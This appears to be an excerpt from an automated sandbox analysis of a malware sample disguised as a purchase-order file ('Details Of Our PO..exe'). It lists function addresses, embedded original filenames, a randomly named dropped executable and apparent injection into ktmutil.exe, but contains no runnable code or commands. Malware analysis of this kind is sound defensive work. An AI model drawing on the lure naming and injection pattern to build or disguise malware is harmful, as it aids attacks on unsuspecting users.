Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B3780	0_2_012B3780
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B6784	0_2_012B6784
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B57E0	0_2_012B57E0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B57F0	0_2_012B57F0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B093A	0_2_012B093A
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B5BB8	0_2_012B5BB8
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B5BC8	0_2_012B5BC8
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B2C41	0_2_012B2C41
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B2C50	0_2_012B2C50
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0985A448	0_2_0985A448
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0985F87A	0_2_0985F87A
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0985C171	0_2_0985C171
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_098503F0	0_2_098503F0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_09850400	0_2_09850400
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0985A43F	0_2_0985A43F
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0A25CBC8	0_2_0A25CBC8
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0A257830	0_2_0A257830
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0A25781F	0_2_0A25781F
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0A255FD1	0_2_0A255FD1
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0A2581E0	0_2_0A2581E0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0A258618	0_2_0A258618
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0A256428	0_2_0A256428
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00418B73	1_2_00418B73
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_004010C0	1_2_004010C0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00403135	1_2_00403135
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00401240	1_2_00401240
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_004102DB	1_2_004102DB
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_004102E3	1_2_004102E3
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_0042F343	1_2_0042F343
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00402B30	1_2_00402B30
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_004033D0	1_2_004033D0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_0040E4E3	1_2_0040E4E3
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00416D6F	1_2_00416D6F
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00416D73	1_2_00416D73
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00410503	1_2_00410503
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_0040E627	1_2_0040E627
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_0040E633	1_2_0040E633
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00402F90	1_2_00402F90
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_004027A0	1_2_004027A0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FE70E9	1_2_00FE70E9
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEF0E0	1_2_00FEF0E0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FDF0CC	1_2_00FDF0CC
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F370C0	1_2_00F370C0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FE81CC	1_2_00FE81CC
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F3B1B0	1_2_00F3B1B0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FF01AA	1_2_00FF01AA
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F1F172	1_2_00F1F172
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FFB16B	1_2_00FFB16B
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F6516C	1_2_00F6516C
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FB8158	1_2_00FB8158
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FCA118	1_2_00FCA118
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F20100	1_2_00F20100
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FD12ED	1_2_00FD12ED
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F4B2C0	1_2_00F4B2C0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F352A0	1_2_00F352A0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FD0274	1_2_00FD0274
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F3E3F0	1_2_00F3E3F0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FF03E6	1_2_00FF03E6
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F7739A	1_2_00F7739A
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEA352	1_2_00FEA352
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F1D34C	1_2_00F1D34C
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FE132D	1_2_00FE132D
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FDE4F6	1_2_00FDE4F6
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F21460	1_2_00F21460
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FE2446	1_2_00FE2446
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEF43F	1_2_00FEF43F
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FCD5B0	1_2_00FCD5B0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FF0591	1_2_00FF0591
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FE7571	1_2_00FE7571
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F30535	1_2_00F30535
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F4C6E0	1_2_00F4C6E0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FE16CC	1_2_00FE16CC
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F2C7C0	1_2_00F2C7C0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEF7B0	1_2_00FEF7B0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F30770	1_2_00F30770
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F54750	1_2_00F54750
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F5E8F0	1_2_00F5E8F0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F338E0	1_2_00F338E0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F168B8	1_2_00F168B8
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F32840	1_2_00F32840
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F3A840	1_2_00F3A840
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F9D800	1_2_00F9D800
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F329A0	1_2_00F329A0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FFA9A6	1_2_00FFA9A6
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F46962	1_2_00F46962
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F39950	1_2_00F39950
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F4B950	1_2_00F4B950
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FDDAC6	1_2_00FDDAC6
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FCDAAC	1_2_00FCDAAC
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F75AA0	1_2_00F75AA0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F2EA80	1_2_00F2EA80
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FA3A6C	1_2_00FA3A6C
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEFA49	1_2_00FEFA49
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FE7A46	1_2_00FE7A46
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FA5BF0	1_2_00FA5BF0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F6DBF9	1_2_00F6DBF9
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FE6BD7	1_2_00FE6BD7
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F4FB80	1_2_00F4FB80
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEFB76	1_2_00FEFB76
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEAB40	1_2_00FEAB40
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F20CF2	1_2_00F20CF2
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEFCF2	1_2_00FEFCF2
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FD0CB5	1_2_00FD0CB5
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FA9C32	1_2_00FA9C32
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F30C00	1_2_00F30C00
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F2ADE0	1_2_00F2ADE0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F4FDC0	1_2_00F4FDC0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F48DBF	1_2_00F48DBF
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FE7D73	1_2_00FE7D73
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FE1D5A	1_2_00FE1D5A
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F33D40	1_2_00F33D40
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F3AD00	1_2_00F3AD00
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEEEDB	1_2_00FEEEDB
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F39EB0	1_2_00F39EB0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F42E90	1_2_00F42E90
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FECE93	1_2_00FECE93
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F30E59	1_2_00F30E59
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEEE26	1_2_00FEEE26
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F3CFE0	1_2_00F3CFE0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F22FC8	1_2_00F22FC8
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEFFB1	1_2_00FEFFB1
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F31F92	1_2_00F31F92
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FA4F40	1_2_00FA4F40
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F50F30	1_2_00F50F30
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F72F28	1_2_00F72F28
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00FEFF09	1_2_00FEFF09
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_03308316	3_2_03308316
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_0330EB82	3_2_0330EB82
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_0330EB86	3_2_0330EB86
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_033062F6	3_2_033062F6
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_0331097D	3_2_0331097D
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_03327156	3_2_03327156
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_033080F6	3_2_033080F6
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_033080EE	3_2_033080EE
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_03306446	3_2_03306446
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FA352	4_2_030FA352
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0304E3F0	4_2_0304E3F0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_031003E6	4_2_031003E6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030E0274	4_2_030E0274
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030C02C0	4_2_030C02C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03030100	4_2_03030100
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030DA118	4_2_030DA118
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030C8158	4_2_030C8158
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030F41A2	4_2_030F41A2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_031001AA	4_2_031001AA
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030F81CC	4_2_030F81CC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030D2000	4_2_030D2000
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03064750	4_2_03064750
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03040770	4_2_03040770
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0305C6E0	4_2_0305C6E0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03040535	4_2_03040535
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03100591	4_2_03100591
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030E4420	4_2_030E4420
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030F2446	4_2_030F2446
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030EE4F6	4_2_030EE4F6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FAB40	4_2_030FAB40
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030F6BD7	4_2_030F6BD7
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0303EA80	4_2_0303EA80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03056962	4_2_03056962
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030429A0	4_2_030429A0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0310A9A6	4_2_0310A9A6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0304A840	4_2_0304A840
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03042840	4_2_03042840
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030268B8	4_2_030268B8
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0306E8F0	4_2_0306E8F0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03082F28	4_2_03082F28
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03060F30	4_2_03060F30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030E2F30	4_2_030E2F30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030B4F40	4_2_030B4F40
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030BEFA0	4_2_030BEFA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03032FC8	4_2_03032FC8
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0304CFE0	4_2_0304CFE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FEE26	4_2_030FEE26
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03040E59	4_2_03040E59
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03052E90	4_2_03052E90
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FCE93	4_2_030FCE93
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FEEDB	4_2_030FEEDB
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0304AD00	4_2_0304AD00
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030DCD1F	4_2_030DCD1F
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03058DBF	4_2_03058DBF
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0303ADE0	4_2_0303ADE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03040C00	4_2_03040C00
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030E0CB5	4_2_030E0CB5
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03030CF2	4_2_03030CF2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030F132D	4_2_030F132D
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0302D34C	4_2_0302D34C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0308739A	4_2_0308739A
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030452A0	4_2_030452A0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0305B2C0	4_2_0305B2C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030E12ED	4_2_030E12ED
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0307516C	4_2_0307516C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0302F172	4_2_0302F172
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0310B16B	4_2_0310B16B
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0304B1B0	4_2_0304B1B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030EF0CC	4_2_030EF0CC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030470C0	4_2_030470C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030F70E9	4_2_030F70E9
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FF0E0	4_2_030FF0E0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FF7B0	4_2_030FF7B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03085630	4_2_03085630
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030F16CC	4_2_030F16CC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030F7571	4_2_030F7571
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030DD5B0	4_2_030DD5B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_031095C3	4_2_031095C3
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FF43F	4_2_030FF43F
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03031460	4_2_03031460
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FFB76	4_2_030FFB76
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0305FB80	4_2_0305FB80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030B5BF0	4_2_030B5BF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0307DBF9	4_2_0307DBF9
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FFA49	4_2_030FFA49
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030F7A46	4_2_030F7A46
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030B3A6C	4_2_030B3A6C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030DDAAC	4_2_030DDAAC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03085AA0	4_2_03085AA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030E1AA3	4_2_030E1AA3
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030EDAC6	4_2_030EDAC6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030D5910	4_2_030D5910
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03049950	4_2_03049950
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0305B950	4_2_0305B950
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030AD800	4_2_030AD800
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030438E0	4_2_030438E0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FFF09	4_2_030FFF09
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03041F92	4_2_03041F92
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FFFB1	4_2_030FFFB1
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03003FD2	4_2_03003FD2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03003FD5	4_2_03003FD5
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03049EB0	4_2_03049EB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03043D40	4_2_03043D40
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030F1D5A	4_2_030F1D5A
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030F7D73	4_2_030F7D73
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0305FDC0	4_2_0305FDC0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030B9C32	4_2_030B9C32
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030FFCF2	4_2_030FFCF2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00511E40	4_2_00511E40
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0050CC90	4_2_0050CC90
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0050CC88	4_2_0050CC88
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0050AE90	4_2_0050AE90
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0050CEB0	4_2_0050CEB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0050AFD4	4_2_0050AFD4
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0050AFE0	4_2_0050AFE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00515520	4_2_00515520
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0051371C	4_2_0051371C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00513720	4_2_00513720
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0052BCF0	4_2_0052BCF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00C0E33C	4_2_00C0E33C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00C0E483	4_2_00C0E483
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00C0D8E8	4_2_00C0D8E8
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00C0E81C	4_2_00C0E81C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00C0CB88	4_2_00C0CB88

Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 0302B970 appears 280 times
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: String function: 03087E54 appears 111 times
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: String function: 00F65130 appears 36 times
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: String function: 00FAF290 appears 105 times
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: String function: 00F77E54 appears 93 times
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: String function: 00F1B970 appears 268 times
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: String function: 00F9EA12 appears 86 times

Source: Details Of Our PO..exe, 00000000.00000000.1175504825.0000000000C9E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedioK.exe( vs Details Of Our PO..exe
Source: Details Of Our PO..exe, 00000000.00000002.1209596073.000000000A500000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Details Of Our PO..exe
Source: Details Of Our PO..exe, 00000000.00000002.1200375344.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Details Of Our PO..exe
Source: Details Of Our PO..exe, 00000001.00000002.1304752116.0000000000937000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamektmutil.exej% vs Details Of Our PO..exe
Source: Details Of Our PO..exe, 00000001.00000002.1305230211.000000000101D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Details Of Our PO..exe
Source: Details Of Our PO..exe	Binary or memory string: OriginalFilenamedioK.exe( vs Details Of Our PO..exe

Source: Details Of Our PO..exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Details Of Our PO..exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
